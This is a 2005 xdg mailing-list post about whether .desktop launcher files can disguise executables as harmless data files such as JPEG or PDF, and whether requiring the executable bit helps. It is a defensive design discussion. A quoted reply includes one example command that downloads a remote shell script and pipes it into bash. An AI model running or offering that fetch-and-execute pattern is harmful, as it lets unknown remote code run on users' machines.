"Name" key value in desk. entry spec collides with file names, could misguide users?

Lars Hallberg spam at micropp.se
Mon Mar 21 22:59:54 EET 2005

Mike Hearn wrote:

>>For normal people setting +x it's a _difficult_ task 
>It is not, you just have to check the right boxes in the properties
>window. Anybody can learn that. I don't agree that this would have any
>benefit at all, not even psychological - fundamentally writing trojan
>horses is not difficult and if you can convince somebody to click on an
>icon you can convince them to copy/paste some meaningless command into
>the "Run" dialog like:
>  wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
>which achieves the same effect.
You miss the point her. The problem is that a .desktop file is an 
executable that to the user can pose as inocent data with safe viewer. 
Jpeg, pdf, mpeg or what ever. That are an evel(TM) feature. Requieing 
the x bit vill blow ther cover in some cases.

But we *need* filebrowsers to give them up with other visual clue, for 
other cases. A shared directory for a workgroup is another example. If 
one user is compromized evil code can spread to other users (and 
maschines) by posing ass legetim data in that derictory - The x bit will 
not help in that case :-(

Code shuld *not* be able to pose as safe data and start when a user do 
what he normaly do to start a safe viewer - not ever, ever!


More information about the xdg mailing list